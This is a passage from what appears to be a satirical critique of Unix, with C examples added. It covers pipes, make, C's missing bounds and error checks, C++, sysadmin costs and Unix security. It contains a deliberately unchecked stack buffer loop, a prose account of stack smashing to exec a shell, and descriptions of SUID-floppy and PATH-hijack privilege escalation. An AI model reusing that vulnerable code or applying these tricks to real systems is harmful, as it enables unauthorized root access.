  • zsh The Z shell
  • bash The GNU bourne-again shell

Pipes

Unix lovers believe in the purity, virtue, and beauty of pipes. They extol pipes as the mechanism that, more than any other feature, makes Unix Unix. “Pipes,” Unix lovers intone over and over again, “allow complex programs to be built out of simpler programs. Pipes allow programs to be used in unplanned and unanticipated ways. Pipes allow simple implementations.” Unfortunately, chanting mantras doesn't do Unix any more good than it does the Hare Krishnas.

Pipes do have some virtue. The construction of complex systems requires modularity and abstraction. This truth is a catechism of computer science. The better tools one has for composing larger systems from smaller systems, the more likely a successful and maintainable outcome. Pipes are a structuring tool, and, as such, have value.

Indeed, while pipes are useful at times, their system of communication between programs -text traveling through standard input and standard output- limits their usefulness. First, the information flow is only one way. Processes can't use shell pipelines to communicate bidirectionally. Second, pipes don't allow any form of abstraction. The receiving and sending processes must use a stream of bytes. Any object more complex than a byte cannot be sent until the object is first transmuted into a string of bytes that the receiving end knows how to reassemble. This means that you can't send an object and the code for the class definition necessary to implement the object. You can't send pointers into another process's address space. You can't send file handles or tcp connections or permissions to access particular files or resources.
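
A small C sketch of the limitation described above (our own illustration, not from the book): everything that crosses a pipe is a flat, one-way stream of bytes, so any richer object has to be flattened by the sender and reparsed by the receiver.

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int fd[2];
    if (pipe(fd) == -1) { perror("pipe"); return 1; }

    if (fork() == 0) {              /* child: the receiving end */
        close(fd[1]);               /* it can only read, never answer back */
        char buf[64];
        ssize_t n = read(fd[0], buf, sizeof buf - 1);
        if (n > 0) {
            buf[n] = '\0';
            printf("child received bytes: %s\n", buf);
        }
        return 0;
    }

    close(fd[0]);                   /* parent: the sending end */
    const char *msg = "just bytes, no structure";
    write(fd[1], msg, strlen(msg)); /* a struct, file handle, or object
                                       would have to be serialized first */
    close(fd[1]);
    wait(NULL);
    return 0;
}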

At the risk of sounding like a hopeless dream keeper of the intergalactic space, we submit that the correct model is procedure call (either local or remote) in a language that allows first-class structures (which C gained during its adolescence) and functional composition.

Pipes are good for simple hacks, like passing around simple text streams, but not for building robust software. For example, an early paper on pipes showed how a spelling checker could be implemented by piping together several simple programs. It was a tour de force of simplicity, but a horrible way to check the spelling (let alone correct it) of a document.

Pipes in shell scripts are optimized for micro-hacking. They give programmers the ability to kludge up simple solutions that are very fragile. That's because pipes create dependencies between the two programs: you can't change the output format of one without changing the input routines of the other.

Most programs evolve: first the program's specifications are envisioned, then the insides of the program are cobbled together, and finally somebody writes the program's output routines. Pipes arrest this process: as soon as somebody starts throwing a half-baked Unix utility into a pipeline, its output specification is frozen, no matter how ambiguous, nonstandard, or inefficient it might be.

Pipes are not the be-all and end-all of program communication. Our favorite Unix-loving book had this to say about the Macintosh, which doesn't have pipes:

“The Macintosh model, on the other hand, is the exact opposite. The system doesn't deal with character streams. Data files are extremely high level, usually assuming that they are specific to an application. When was the last time you piped the output of one program to another on a Mac? (Good luck even finding the pipe symbol.) Programs are monolithic, the better to completely understand what you are doing. You don't take MacFoo and MacBar and hook them together.” -From Life with Unix, by Libes and Ressler

Yeah, those poor Mac users. They've got it so rough. Because they can't pipe streams of bytes around, how are they going to paste artwork into their latest memo and have text flow around it? How are they going to transfer a spreadsheet into their memo? And how could such users expect changes to be tracked automatically? They certainly shouldn't expect to be able to electronically mail this patched-together memo across the country and have it seamlessly read and edited at the other end, and then returned to them unscathed. We can't imagine how they've been transparently using all these programs together for the last 10 years and having them all work, all without pipes.

Research has shown that pipes and redirection are hard to use, not because of conceptual problems, but because of arbitrary and unintuitive limitations. It is documented that only those steeped in Unixdom, not run-of-the-mill users, can appreciate or use the power of pipes.

Find

“The most horrifying thing about Unix is that, no matter how many times you hit yourself over the head with it, you never quite manage to lose consciousness. It just goes on and on.” -Patrick Sobalvarro

The Apple Macintosh and Microsoft Windows have powerful file locators that are relatively easy to use and extremely reliable. These file finders were designed with a human user and modern networking in mind. The Unix file finder program, find, wasn't designed to work with humans, but with cpio -a Unix backup utility program. Find couldn't anticipate networks or enhancements to the file system such as symbolic links; even after extensive modifications, it still doesn't work well with either. As a result, despite its importance to humans who've misplaced their files, find doesn't work reliably or predictably.

The authors of Unix tried to keep find up to date with the rest of Unix, but it is a hard task. Today's find has special flags for NFS file systems, symbolic links, executing programs, conditionally executing programs if the user types “y”, and even directly archiving the found files in cpio or cpio-c format. Sun Microsystems modified find so that a background daemon builds a database of every file in the entire Unix file system which, for some strange reason, the find command will search if you type “find filename” without any other arguments. (Talk about a security violation!) Despite all of these hacks, find still doesn't work properly.

Part 9: Programming

“Hold still, this won't hurt a bit”

“Do not meddle in the affairs of Unix, for it is subtle and quick to core dump.” -Anonymous.

The wonderful Unix programming environment

The Unix zealots make much of the Unix “programming environment.” They claim Unix has a rich set of tools that makes programming easier. Unix is not the world's best software environment -it is not even a good one. The Unix programming tools are a shame; interpreters remain the play toy of the very rich; and change logs and audit trails are recorded at the whim of the person being audited. Yet somehow Unix maintains its reputation as a programmer's dream. Maybe it lets programmers dream about being productive, rather than letting them actually be productive.

Don't know how to make love. Stop.

The ideal programming tool should be quick and easy to use for common tasks and, at the same time, powerful enough to handle tasks beyond that for which it was intended. Unfortunately, in their zeal to be general, many Unix tools forget about the quick and easy part. Make is one such tool. In abstract terms, make's input is a description of a dependency graph. Each node of the dependency graph contains a set of commands to be run when that node is out of date with respect to the nodes that it depends on. Nodes correspond to files, and the file dates determine whether the files are out of date with respect to each other. A small dependency graph, or Makefile, is shown below:

program: source1.o source2.o
  cc -o program source1.o source2.o
source1.o: source1.c
  cc -c source1.c
source2.o: source2.c
  cc -c source2.c

In this graph, the nodes are program, source1.o, source2.o, source1.c, and source2.c. The node program depends on the source1.o and source2.o nodes. When either source1.o or source2.o is newer than program, make will regenerate program by executing the command cc -o program source1.o source2.o. And, of course, if source1.c has been modified, then both source1.o and program will be out of date, necessitating a recompile and a relink.

While make's model is quite general, the designers forgot to make it easy to use for common cases. In fact, very few novice Unix programmers know exactly how utterly easy it is to screw yourself to a wall with make, until they do it.

Utility programs and man pages

Unix utilities are self-contained; each is free to interpret its command-line arguments as it sees fit. This freedom is annoying; instead of being able to learn a single set of conventions for command line arguments, you have to read a man page for each program to figure out how to use it.

The source is the documentation. Oh, great!

“If it was hard to write, it should be hard to understand.” -A Unix programmer

Back in the documentation chapter, we said that Unix programmers believe that the operating system's source code is the ultimate documentation. “After all”, says one noted Unix historian, “the source is the documentation that the operating system itself looks to when it tries to figure out what to do next.”

But trying to understand Unix by reading its source code is like trying to drive Ken Thompson's proverbial Unix car (the one with a single “?” on its dashboard) cross country.

The Unix kernel sources (in particular, the Berkeley Network Tape 2 sources available from ftp.uu.net) are mostly uncommented, do not skip any lines between “paragraphs” of code, use plenty of gotos, and generally try very hard to be unfriendly to people trying to understand them. As one hacker put it, “Reading the Unix kernel source is like walking down a dark alley. I suddenly stop and think 'Oh no, I'm about to be mugged.'”

Of course, the kernel sources have their own version of the warning light. Sprinkled throughout are little comments that look like this:

/* XXX */

These mean that something is wrong. You should be able to figure out exactly what it is that's wrong in each case.

It can't be a bug, my makefile depends on it!

The programmers at BBN were generally the exception. Most Unix programmers don't fix bugs: most don't have source code. Those with the code know that fixing bugs won't help. That's why when most Unix programmers encounter a bug, they simply program around it.

It's a sad state of affairs: if one is going to solve a problem, why not solve it once and for all instead of for a single case that will have to be repeated for each new program ad infinitum? Perhaps early Unix programmers were closet metaphysicians who believed in Nietzsche's doctrine of Eternal Recurrence.

There are two schools of debugging thought. One is the “debugger as physician” school, which was popularized in early ITS and Lisp systems. In these environments, the debugger is always present in the running program and when the program crashes, the debugger/physician can diagnose the problem and make the program well again.

Unix follows the older “debugging as autopsy” model. In Unix, a broken program dies, leaving a core file that is like a dead body in more ways than one. A Unix debugger then comes along and determines the cause of death. Interestingly enough, Unix programs tend to die from curable diseases, accidents, and negligence, just as people do.

Dealing with the Core

After your program has written out a core file, your first task is to find it. This shouldn't be too difficult a task, because the core file is quite large -4, 8, and even 12 megabyte core files are not uncommon.

Core files are large because they contain almost everything you need to debug your program from the moment it died: stack, data, pointers to code… everything, in fact, except the program's dynamic state. If you were debugging a network program, by the time your core file is created, it's too late: the program's network connections are gone. As an added slap, any files it might have had open are now closed. Unfortunately, under Unix, it has to be that way.

For instance, one cannot run a debugger as a command interpreter or transfer control to a debugger when the operating system generates an exception. The only way to have a debugger take over from your program when it crashes is to run every program from your debugger.

Filename expansion

There is one exception to Unix's each-program-is-self-contained rule: file-name expansion. Very often, one wants Unix utilities to operate on one or more files. The Unix shells provide a shorthand for naming groups of files that are expanded by the shell, producing a list of files that is passed to the utility.

For example, say your directory contains the files A, B, and C. To remove all of these files, you might type 'rm *'. The shell will expand '*' to 'A B C' and pass these arguments to rm. There are many, many problems with this approach, which we discussed in the previous chapter. You should know, though, that using the shell to expand filenames is not an historical accident: it was a carefully reasoned design decision. In “The Unix Programming Environment” by Kernighan and Mashey (IEEE Computer, April 1981), the authors claim that, “Incorporating this mechanism into the shell is more efficient than duplicating it everywhere and ensures that it is available to programs in a uniform way.”

Robustness, or "All lines are shorter than 80 characters"

There is an amusing article in the December 1990 issue of “Communications of the ACM” entitled “An empirical study of the reliability of Unix utilities” by Miller, Fredriksen, and So. They fed random input to a number of Unix utility programs and found that they could make 24-33% (depending on which vendor's Unix was being tested) of the programs crash or hang. Occasionally the entire operating system panicked.

Most of the bugs were due to a number of well-known idioms of the C programming language. In fact, much of the inherent brain damage in Unix can be attributed to the C language. Unix's kernel and all its utilities are written in C. The noted linguistic theorist Benjamin Whorf said that our language determines what concepts we can think. C has this effect on Unix; it prevents programmers from writing robust software by making such a thing unthinkable.

The C language is minimal. It was designed to be compiled efficiently on a wide variety of computer hardware and, as a result, has language constructs that map easily onto computer hardware.

At the time Unix was created, writing an operating system's kernel in a high-level language was a revolutionary idea. The time has come to write one in a language that has some form of error checking.

C is a lowest-common-denominator language, built at a time when the lowest common denominator was quite low. If a PDP-11 didn't have it, then C doesn't have it. The last few decades of programming language research have shown that adding linguistic support for things like error handling, automatic memory management, and abstract data types can make it dramatically easier to produce robust, reliable software. C incorporates none of these findings. Because of C's popularity, there has been little motivation to add features such as data tags or hardware support for garbage collection into the last, current, and next generations of microprocessors: these features would amount to nothing more than wasted silicon, since the majority of programs, written in C, wouldn't use them.

Recall that C has no way to handle integer overflow. The solution when using C is simply to use integers that are larger than the problem you have to deal with -and hope that the problem doesn't get larger during the lifetime of your program.
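A minimal sketch of the problem (ours, not the book's); nothing in the language checks the arithmetic below, so it silently goes wrong:

#include <stdio.h>
#include <limits.h>

int main(void) {
  int per_year = 365 * 24 * 60 * 60;  /* 31,536,000: fits comfortably in a 32-bit int */
  int per_century = per_year * 100;   /* 3,153,600,000: does not fit                  */

  /* Signed overflow is undefined behavior in ISO C; on a typical
     two's-complement machine it simply wraps around with no warning. */
  printf("seconds per century: %d (INT_MAX is %d)\n", per_century, INT_MAX);
  return 0;
}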

C doesn't really have arrays either. It has something that looks like an array but is really a pointer to a memory location. There is an array indexing expression, array[index], that is merely shorthand for the expression (*(array+index)). Therefore it's equally valid to write index[array], which is also shorthand for (*(array+index)). Clever, huh? This duality can be commonly seen in the way C programs handle character arrays. Array variables are used interchangeably as pointers and as arrays.

To belabor the point, if you have:

char *str = "bugy";

… then the following equivalencies are also true:

0 [str]    == 'b'
*(str+1)   == 'u'
*(2+str)   == 'g'
str[3]     == 'y'

Isn't C grand?

The problem with this approach is that C doesn't do any automatic bounds checking on array references. Why should it? The arrays are really just pointers, and you can have pointers to anywhere in memory, right? Well, you might want to ensure that a piece of code doesn't scribble all over arbitrary pieces of memory, especially if the piece of memory in question is important, like the program's stack.

This brings us to the first source of bugs mentioned in the Miller paper. Many of the programs that crashed did so while reading input into a character buffer that was allocated on the call stack. Many C programs do this; the following C function reads a line of input into a stack-allocated array and then calls do_it on the line of input.

a_function() {
  char c,buff[80];
  int i = 0;
  while ((c=getchar()) != '\n')
    buff [i++]=c;
  buff[i]='\000';
  do_it(buff);
}

Code like this litters Unix. Note how the stack buffer is 80 characters long -because most Unix files only have lines that are shorter than 80 characters. Note also how there is no bounds check before a new character is stored in the character array and no test for an end-of-file condition. The bounds check is probably missing because the programmer likes how the assignment statement (c=getchar()) is embedded in the loop conditional of the while statement. There is no room to check for end-of-file because that line of code is already testing for the end of a line. Believe it or not, some people actually praise C for just this kind of terseness -understandability and maintainability be damned! Finally, do_it is called, and the character array suddenly becomes a pointer, which is passed as the first function argument.

When Unix users discover these built-in limits, they tend not to think that the bugs should be fixed. Instead, users develop ways to cope with the situation. For example, tar, the Unix “tape archiver,” can't deal with path names longer than 100 characters (including directories). Solution: don't use tar to archive directories to tape; use dump. Better solution: don't use deep subdirectories, so that a file's absolute path name is never longer than 100 characters. The ultimate example of careless Unix programming will probably occur at 10:14:07 p.m. on January 18, 2038, when Unix's 32-bit timeval field overflows…

To continue with our example, let's imagine that our function is called upon to read a line of input that is 85 characters long. The function will read the 85 characters with no problem, but where do the last 5 characters end up? The answer is that they end up scribbling over whatever happened to be in the 5 bytes right after the character array. What was there before?

The two variables, c and i, might be allocated right after the character array and therefore might be corrupted by the 85-character input line. What about an 850-character input line? It would probably overwrite important bookkeeping information that the C runtime system stores on the stack, such as addresses for returning from subroutine calls. At best, corrupting this information will probably cause a program to crash.

We say “probably” because you can corrupt the runtime stack to achieve an effect that the original programmer never intended. Imagine that our function was called upon to read a really long line, over 2,000 characters, and that this line was set up to overwrite the bookkeeping information on the call stack so that when the C function returns, it will call a piece of code that was also embedded in the 2,000-character line. This embedded piece of code may do something truly useful, like exec a shell that can run commands on the machine.
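For contrast, here is a hedged sketch (ours, not the book's) of the same job done defensively: it uses an int to hold getchar()'s return value, tests for end-of-file, and refuses to write past the end of the buffer:

#include <stdio.h>

#define BUFSIZE 80

extern void do_it(char *line);   /* as in the example above */

void a_safer_function(void) {
  char buff[BUFSIZE];
  int c, i = 0;

  while ((c = getchar()) != '\n' && c != EOF) {
    if (i < BUFSIZE - 1)
      buff[i++] = c;   /* keep what fits; quietly drop the rest instead of smashing the stack */
  }
  buff[i] = '\0';
  do_it(buff);
}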

Exceptional conditions

The main challenge of writing robust software is gracefully handling errors and other exceptions. Unfortunately, C provides almost no support for handling exceptional conditions. As a result, few people learning programming in today's schools and universities know what exceptions are.

Exceptions are conditions that can arise when a function does not behave as expected. Exceptions frequently occur when requesting system services such as allocating memory or opening files. Since C provides no exception handling support, the programmer must add several lines of exception-handling code for each service request.

For example, this is the way that all of the C textbooks say you are supposed to use the malloc() memory allocation function:

struct bpt *another_function() {
  struct bpt *result;

  result=malloc (sizeof (struct bpt));
  if (result==0) {
    fprintf (stderr, "error: malloc: ???\n");
    /*recover gracefully from the error*/
    [...]
    return 0;
  }
  /* Do something interesting */
  [...]
  return result;
}

The function another_function allocates a structure of type bpt and returns a pointer to the new struct. The code fragment shown allocates memory for the new struct. Since C provides no explicit exception-handling support, the C programmer is forced to write exception handlers for each and every system service request.

Or not. Many C programmers choose not to be bothered with such trivialities and simply omit the exception-handling code. Their programs look like this:

struct bpt *another_function () {
  struct bpt *result=malloc (sizeof(struct bpt));
  /*Do something interesting*/
  return result;
}

It's simpler, cleaner, and most of the time operating system service requests don't return errors, right? Thus programs ordinarily appear bug free until they are put into extraordinary circumstances, whereupon they mysteriously fail.
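A common compromise among C programmers -sketched here, not taken from the book- is to write the check exactly once, in a wrapper, and call the wrapper everywhere (the name xmalloc is just a convention):

#include <stdio.h>
#include <stdlib.h>

/* Allocate memory or give up loudly: the malloc() check lives here instead
   of being repeated (or forgotten) at every call site. */
void *xmalloc(size_t size) {
  void *p = malloc(size);
  if (p == NULL) {
    fprintf(stderr, "xmalloc: out of memory (%lu bytes)\n", (unsigned long) size);
    exit(1);
  }
  return p;
}

It still isn't exception handling -the program can only die- but at least it dies with a message instead of dereferencing a null pointer far from the scene of the crime.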

Lisp implementations usually have real exception-handling systems. The exceptional conditions have names like OUT-OF-MEMORY, and the programmer can establish exception handlers for specific types of conditions. These handlers get called automatically when the exceptions are raised -no intervention or special tests are needed on the part of the programmer. When used properly, these handlers lead to more robust software.

If you can't fix it, restart it!

So what do system administrators and others do with vital software that doesn't properly handle errors, bad data, and bad operating conditions? Well, if it runs OK for a short period of time, you can make it run for a long period of time by periodically restarting it. The solution isn't very reliable or scalable, but it is good enough to keep Unix creaking along.

Part 10: C++

“The COBOL of the 90s”

“Q. Where did the names 'C' and 'C++' come from? A. They were grades” -Jerry Leichter.

It was perhaps inevitable that out of the Unix philosophy of not ever making anything easy for the user would come a language like C++. The idea of object-oriented programming dates back to Simula in the 60s, hitting the big time with Smalltalk in the early 70s. Other books can tell you how using any of a dozen object-oriented languages can make programmers more productive, make code more robust, and reduce maintenance costs. Don't expect to see any of these advantages in C++.

That's because C++ misses the point of what being object-oriented was all about. Instead of simplifying things, C++ sets a new world record for complexity. Like Unix, C++ was never designed; it mutated as one goofy mistake after another became obvious. There is no grammar specifying the language (something practically all other languages have), so you can't even tell whether a given line of code is legitimate or not.

Comparing C++ to COBOL is unfair to COBOL, which actually was a marvelous feat of engineering, given the technology of its day. The only marvelous thing about C++ is that anyone manages to get any work done in it at all. Fortunately, most good programmers know that they can avoid C++ by writing largely in C, steering clear of most of the ridiculous features that they'll probably never understand anyway. Usually, this means writing their own non-object-oriented tools to get just the features they need. Of course, this means their code will be idiosyncratic, incompatible, and impossible to understand or reuse. But a thin veneer of C++ here and there is just enough to fool managers into approving their projects.

The assembly language of object-oriented programming.

There's nothing high-level about C++. To see why, let us look at properties of a true high-level language:

  • Elegance: there is a simple, easily understood relationship between the notation used by a high-level language and the concepts expressed.
  • Abstraction: each expression in a high-level language describes one and only one concept. Concepts may be described independently and combined freely.
  • Power: with a high-level language, any precise and complete description of the desired behavior of a program may be expressed straightforwardly in that language.

A high-level language lets programmers express solutions in a manner appropriate to the problem. High-level programs are relatively easy to maintain because their intent is clear. From one piece of high-level source code, modern compilers can generate very efficient code for a wide variety of platforms, so high-level code is naturally very portable and reusable.

A low-level language demands attention to myriad details, most of which have more to do with the machine's internal operation than with the problem being solved. Not only does this make the code inscrutable, but it builds in obsolescence. As new systems come along, practically every other year these days, low-level code becomes out of date and must be manually patched or converted at enormous expense.

Pardon me, your memory is leaking...

It's well known that the vast majority of program errors have to do with memory mismanagement. Before you can use an object, you have to allocate some space for it, initialize it properly, keep track of it somehow, and dispose of it properly. Of course, each of these tasks is extraordinarily tedious and error-prone, with disastrous consequences for the slightest error. Detecting and correcting these mistakes is notoriously difficult, because they are often sensitive to subtle differences in configuration and usage patterns for different users.

Use a pointer to a structure (but forget to allocate memory for it), and your program will crash. Use an improperly initialized structure, and it corrupts your program; it will crash, but perhaps not right away. Fail to keep track of an object, and you might deallocate its space while it's still in use. Crash city. Better allocate some more structures to keep track of the structures that you need to allocate space for. But if you're conservative, and never reclaim an object unless you're absolutely sure it's no longer in use, watch out. Pretty soon you'll fill up memory with unreclaimed objects, run out of space, and crash. This is the dreaded “memory leak.”
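The two classic failures fit in a few lines of C (an illustrative sketch, with the malloc checks themselves omitted for brevity):

#include <stdlib.h>
#include <string.h>

void leak_and_dangle(void) {
  char *copy, *alias;

  copy = malloc(64);
  strcpy(copy, "never freed");  /* bug 1: the leak -this block becomes...       */
  copy = malloc(64);            /* ...unreachable the moment copy is reassigned */

  alias = copy;
  free(copy);                   /* bug 2: alias now dangles...                  */
  alias[0] = 'X';               /* ...and this write corrupts freed memory      */
}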

Most real high-level languages give you a solution for this -it's called a garbage collector. It tracks all your objects for you, recycles them when they're done, and never makes a mistake. When you use a language with a built-in garbage collector, several wonderful things happen:

  • The vast majority of your bugs immediately disappear. Now, isn't that nice?
  • Your code becomes much smaller and easier to write and understand, because it isn't cluttered with memory-management details.
  • Your code is more likely to run at maximum efficiency on many different platforms in many different configurations.

C++ users, alas, are forced to pick up their garbage manually. Many have been brainwashed into thinking that somehow this is more efficient than using something written by experts specially for the platform they use.

The evolution of a programmer.

/*High school/Junior high*/

	10 PRINT "HELLO WORLD"
	20 END

/*First year in college*/

	program Hello (input, output);
	      begin
		writeln ('Hello world');
	      end.

/*Senior year in college*/

	(defun hello ()
	      (print (list 'HELLO 'WORLD)))

/*New professional*/

	#include <stdio.h>
	main (argc, argv)
	int argc;
	char **argv; {
	      printf ("Hello World!\n");
	}

/*Seasoned pro*/

	#include <stream.h>

	const int MAXLEN=80;

	class outstring;
	class outstring {
	      private:

	      int size;
	      char str[MAXLEN];

	      public:

	      outstring() {size=0;}
	      ~outstring() {size=0;}
	      void print();
	      void assign (char *chrs);
	};

	void outstring::print() {
	int i;
	for (i=0; i<size; i++)
	      cout << str [i];
	cout<<"\n";
	}

	void outstring::assign (char *chrs) {
	int i;
	for (i=0; chrs [i] != '\0'; i++)
	      str[i]=chrs[i];
	size=i;
	}

	main (int argc, char **argv) {
	outstring string;

	string.assign ("Hello World!");
	string.print();
	}

/*Manager*/

"George, I need a program to output the string 'Hello World!'"

Part 11: System Administration

“Unix's Hidden Cost”

“If the automobile had followed the same development as the computer, a Rolls-Royce would today cost $100, get a million miles per gallon, and explode once a year killing everyone inside.” -Robert Cringely, InfoWorld.

All Unix systems require a System Administrator, affectionately known as a Sysadmin. The sysadmin's duties include:

  • Bringing the system up.
  • Installing new software.
  • Administrating user accounts.
  • Tuning the system for maximum performance.
  • Overseeing system security.
  • Performing routine backups.
  • Shutting down the system to install new hardware.
  • Helping users out of jams.

The thesis of this chapter is that the economics of maintaining a Unix system is very poor and that the overall cost of keeping Unix running is much higher than the cost of maintaining the hardware that hosts it.

Paying someone $40,000 a year to maintain 20 machines translates into $2,000 per machine-year. Typical low-end Unix workstations cost between $3,000 and $5,000 and are replaced about every two years. Combine the administration cost with the cost of the machine and software, and it becomes clear that the allegedly cost-effective “solution” of “open systems” isn't really cost-effective at all.

Keeping Unix running and tuned.

Sysadmins are highly paid baby sitters. Just as a baby transforms perfectly good input into excrement, which it then drops in its diapers, Unix drops excrement all over its file system and the network in the form of dumps from crashing programs, temporary files that aren't, cancerous log files, and illegitimate network rebroadcasts. But unlike the baby, who may smear his nuggets around but generally keeps them in his diapers, Unix plays hide and seek with its waste. Without an experienced sysadmin to ferret them out, the system slowly runs out of space, starts to stink, gets uncomfortable, and complains or just dies.

Unix Systems become senile in weeks, not years.

Unix was developed in a research environment where systems rarely stayed up for more than a few days. It was not designed to stay up for weeks at a time, let alone continuously. Compounding the problem is how Unix utilities and applications (especially those from Berkeley) are seemingly developed: a programmer types in some code, compiles it, runs it, and waits for it to crash. Programs that don't crash are presumed to be running correctly. Production-style quality assurance, so vital for third-party application developers, wasn't part of the development culture.

It's not surprising that most major Unix systems suffer from memory leaks, garbage accumulation, and slow corruption of their address space -problems that typically show themselves only after a program has been running for a few days.

Disk partitions and backups.

Disk space management is a chore on all types of computer systems; on Unix, it's a Herculean task. Before loading Unix onto your disk, you must decide upon a space allocation for each of Unix's partitions. Unix treats your disk drive as a collection of smaller disks (each containing a complete file system), as opposed to other systems like TOPS-20, which let you create a larger logical disk out of a collection of smaller physical disks.

Every alleged feature of disk partitions is really there to mask some bug or misdesign. For example, disk partitions allow you to dump or not dump certain sections of the disk without needing to dump the whole disk. But this “feature” is only needed because the dump program can only dump a complete file system. Disk partitions are touted as hard disk quotas that limit the amount of space a runaway process or user can use up before his programs halt. This “feature” masks a deficient file system that provides no facilities for placing disk quota limits on directories or portions of a file system. These “features” engender further bugs and problems, which, not surprisingly, require a sysadmin (and additional, recurring costs) to fix. Unix commonly fails when a program or user fills up the /tmp directory, thus causing most other processes that require temporary disk space to fail. Most Unix programs don't check whether writes to disk complete successfully; instead, they just proceed merrily along, writing your email to a full disk. In comes the sysadmin, who “solves” the problem by rebooting the system, because the boot process will clear out all the crud that accumulated in the /tmp directory. So now you know why the boot process cleans out /tmp.
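What “checking” would actually take is easy to sketch (our code, not the book's): the error can surface at the write, at the flush, or only when the file is closed, and all three have to be looked at.

#include <stdio.h>

/* Returns 0 on success, -1 if the data may not have reached the disk. */
int save_text(const char *path, const char *text) {
  FILE *f = fopen(path, "w");
  if (f == NULL)
    return -1;
  if (fprintf(f, "%s\n", text) < 0 || fflush(f) == EOF) {
    fclose(f);
    return -1;                        /* disk full, quota exceeded, ...              */
  }
  return (fclose(f) == EOF) ? -1 : 0; /* the last buffered block can still fail here */
}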

The swap partition is another fixed-size chunk of disk that frequently turns out not to be large enough. In the old days, when disks were small and fast disks were much more expensive than slow ones, it made sense to put the entire swap partition on a single fast, small drive. But it no longer makes sense to have the swap be a fixed size.

The problem of fixed-size disk partitions hurts less now that gigabyte disks are standard equipment. The manufacturers ship machines with disk partitions large enough to avoid problems. It's a relatively expensive solution, but much easier to implement than fixing Unix.

Partitions: Twice the Fun.

Because of Unix's tendency to trash its own file system, early Unix gurus developed a workaround to keep all of their files from getting regularly trashed: partition the disk into separate spaces. If the system crashes, and you get lucky, only half your data will be gone. The file system gets trashed because the free list on disk is usually inconsistent. When Unix crashes, the disks with the most activity get the most corrupted, because those are the most inconsistent disks -that is, they had the greatest amount of information in memory and not on the disk. So the gurus partitioned their disks, dividing a single physical disk into several smaller, virtual disks, each with its own file system.

There are two simple rules that should be obeyed when partitioning disks:

  1. Partitions must not overlap
  2. Each partition must be allocated for only one purpose

Part 12: Security

“Oh, I'm sorry, Sir, Go ahead, I didn't realize you were root”

“Unix is computer-scientology, not computer science.” -Dave Mankins.

The term “Unix security” is, almost by definition, an oxymoron, because the Unix operating system was not designed to be secure, except for the vulnerable and ill-designed root/rootless distinction. Security measures to thwart attack were an afterthought. Thus, when Unix is behaving as expected, it is not secure, and making Unix run “securely” means forcing it to do unnatural acts. It's like the dancing dog at a circus, but not as funny -especially when it is your files that are being eaten by the dog.

Holes in the armor.

Two fundamental design flaws prevent Unix from being secure. First, Unix stores security information about the computer inside the computer itself, without encryption or other mathematical protections. It's like leaving the keys to your safe sitting on your desk: as soon as an attacker breaks through the Unix front door, he's compromised the entire system. Second, the Unix superuser concept is a fundamental security weakness.

Superuser: The Superflaw

All multiuser operating systems need privileged accounts. Virtually all multiuser operating systems other than Unix apportion privilege according to need. Unix's “superuser” is all-or-nothing. An administrator who can change people's passwords must also, by design, be able to wipe out every file on the system. That high school kid you've hired to do backups might accidentally (or intentionally) leave your system open to attack.

Many Unix programs and utilities require superuser privileges. Complex and useful programs need to create files or write in directories to which the user of the program does not have access. To ensure security, programs that run as superuser must be carefully scrutinized to ensure that they exhibit no unintended side effects and have no holes that could be exploited to gain unauthorized superuser access. Unfortunately, this security audit procedure is rarely performed (most third-party software vendors, for example, are unwilling to disclose their source code to their customers, so these companies couldn't even conduct an audit if they wanted to).

The problem with SUID

The Unix concept called SUID, or setuid, raises as many security problems as the superuser concept does. SUID is a built-in security hole that provides a way for regular users to run commands that require special privileges to operate. When run, an SUID program assumes the privileges of the person who installed the program, rather than the person who is running the program. Most SUID programs are installed SUID root, so they run with superuser privileges.

The designers of the Unix operating system would have us believe that SUID is a fundamental requirement of an advanced operating system. The most common example given is /bin/passwd, the Unix program that lets users change their passwords. The /bin/passwd program changes a user's password by modifying the contents of the file /etc/passwd. Ordinary users can't be allowed to modify /etc/passwd directly, because then they could change each other's passwords. The /bin/passwd program, which is run by mere users, assumes superuser privileges when run and is constructed to change only the password of the user running it and nobody else's.

Unfortunately, while /bin/passwd is running as superuser, it doesn't just have permission to modify the file /etc/passwd: it has permission to modify any file, indeed, do anything it wants. (After all, it's running as root, with no security checks.) If it can be subverted while it is running -for example, if it can be convinced to create a subshell- then the attacking user can inherit these superuser privileges to control the system.
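The discipline a correct SUID program has to follow can be sketched like this (our illustration, not the real /bin/passwd):

#include <stdio.h>
#include <unistd.h>

int main(void) {
  uid_t invoker = getuid();    /* the user who actually ran the program        */
  uid_t acting  = geteuid();   /* the user whose privileges it runs with: root */

  printf("real uid %d, effective uid %d\n", (int) invoker, (int) acting);

  /* Everything from here on must be restricted to what 'invoker' is entitled
     to do, because the kernel will let effective-UID 0 touch anything at all.
     One missed check and the game is over. */
  return 0;
}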

AT&T was so pleased with the SUID concept that it patented it. The intent was that SUID would simplify operating system design by obviating the need for a monolithic subsystem responsible for all aspects of system security. Experience has shown that most of Unix's security flaws come from SUID programs.

When combined with removable media (such as floppy disks or SyQuest drives), SUID gives the attacker a powerful way to break into otherwise “secure” systems: simply put an SUID root file on a floppy disk and mount it, then run the SUID root program to become root. (The Unix-savvy reader might object to this attack, saying that mount is a privileged command that requires superuser privileges to run. Unfortunately, many manufacturers now provide SUID programs for mounting removable media specifically to ameliorate this “inconvenience.”)

Processes are cheap -and dangerous.

Another software tool for breaking Unix security is the pair of system calls fork() and exec(), which enable one program to spawn other programs. Programs spawning subprograms lie at the heart of Unix's tool-based philosophy. Emacs and FTP run subprocesses to accomplish specific tasks such as listing files. The problem for the security-conscious is that these programs inherit the privileges of the programs that spawn them.

Easily spawned subprocesses are a two-edged sword, because a spawned subprogram can be a shell that lowers the drawbridge to let the Mongol hordes in. When the spawning program is running as superuser, its spawned processes also run as superuser. Many a cracker has gained entry through spawned superuser shells.

The problem with PATH

Unix has to locate the executable image that corresponds to a given command name. To find the executable, Unix consults the user's PATH variable for a list of directories to search. For example, if your PATH environment variable is /bin:/usr/bin:/etc:/usr/local/bin, then when you type snarf, Unix will automatically search through the /bin, /usr/bin, /etc, and /usr/local/bin directories, in that order, for a program called snarf.

So far, so good. However, PATH variables such as this one are a common disaster:

PATH=:.:/bin:/usr/bin:/usr/local/bin:

The empty entries and the “.” put the current directory in the search path, so an attacker only has to leave a program named after a common command (ls, say) in some directory and wait for a privileged user to cd there and type that command: the attacker's program then runs with the victim's privileges.

Startup traps

